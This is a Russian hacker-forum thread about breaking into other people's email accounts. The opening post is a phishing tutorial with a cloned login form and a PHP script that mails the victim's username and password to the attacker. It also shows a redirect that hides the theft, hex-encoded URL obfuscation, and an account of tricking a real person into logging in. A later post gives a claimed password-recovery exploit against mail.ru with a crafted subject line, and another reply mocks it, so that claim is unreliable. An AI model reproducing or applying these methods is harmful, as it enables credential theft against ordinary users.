Форум АНТИЧАТ - Опять ломаем мыло

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Опять ломаем мыло (https://forum.antichat.xyz/showthread.php?t=365)

Ну че? продолжим, а то Algol закрыл самую тусу, где больше всего постов. Я конечно малость переусердствовал ну..., а как без этого. Бывалый чел поймет меня. Так что продолжим тему в серьез, пока админы не обидятся на столь популярную тему.

<table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу ошибки. Сами видете два поля ввода для логин и пасс. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью html редактора, лучше всего использовать DreamweaverMX, хотя можете сделать это обычным Notepad, Вот фрагмент скрипта:

<table cellpadding=1 cellspacing=0 border=0>
<form method="post" name="logon" action="http://mail.xakep.ru/cgi-bin/mail" onSubmit="Save();">
<tr>
<td class=small align=right>eiaei</td>
<td class=text><input type="text" name="username" size="8" style="width: 95px;"><input type="hidden" name="domain" value="xakep.ru"></td>
<td class=text> @xakep.ru</td>
<td>&nbsp;&nbsp;&nbsp;</td>
<td class=small align=right>ia?ieu</td>
<td class=text><input type="password" name="password" size="8" style="width: 95px;"></td>
</tr>

Нас интересуют только action, username и password. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему php скрипту. Вот весь скрипт:

<?
mail("redx@narod.ru",
"Lost password",
"$username\n
$password
");
echo ("
<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\">
");
?>

Редирект тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой пример.
Для танкистов: нам нужен хост с поддержкой php. Из бесплатных нам подойдет Holm.

Кажись вы не довольны тем что url у вас получился типа http://antilamer.h1.ru. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в hex. И мы можем превратить наше www.antilamer.h1.ru в %61%6E%74%69%6C%61%6D%65%72% 2E%68%31%2E%72%75. Можно перед hex кодом добавить еще www.xakep.ru@. Выглядеть это будет так:
http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%7 2%75

Удачного хака.[/QUOTE]

Я написал такую статью, но на неё мало кто отреагировал, хотя..., самый действенный метод. В отличии от моей ловушки в которую мог попасть случайный прохожий, в этом методе можно направить свою атаку на определённого человека. Самое главное убедить его в необходимости залогиниться с нашей страницы. Методов моря, хоть мыльте от SUPPORT'а или как фантазия позволит. Я свою жертву в Инет-Клубе сам заставил залогиниться, набрал адрес своей страницы, и предложил ему проверить свою почту. Благо мест в зале небыло..., а я такой добрый.

Способ отличный, им можно взломать не только мыло. Можно сделать такую же страницу провайдера и сказать юзверю что это быстрый способ проверить личный кабинет, например, на РОЛе. Неплолхо бы эту статью поместить в мой топик про халявный инет.

Вот вам тестовая страница

Пароль и логин отсылаются на мыло:
test_for_antichat@xakep.ru
pass: antichat

Проведите тест и сами убедитесь.

Да...ничё так способ.Только на лохов из чата расчитан.Надо топик открыть по всем таким способам,ну типа этго или с так называемыми email-роботами RedX'a http://forum.antichat.ru/iB_html/non...cons/smile.gif

и урл напишите тут на новую тему...

=> MrPort

Так любой метод расчитан только на лохов, мы то дай бог фишку просечем.

Так а что мыло ломать УЖЕ никто не хочет? Ну или научить.

На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_retriever@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем http://forum.antichat.ru/iB_html/non...icons/wink.gif )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_retriever@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hac ker&pass=qwerty&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hac ker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!! http://forum.antichat.ru/iB_html/non...ns/biggrin.gif  http://forum.antichat.ru/iB_html/non...ns/biggrin.gif

vetal, ты тут нас за детский садик держишь?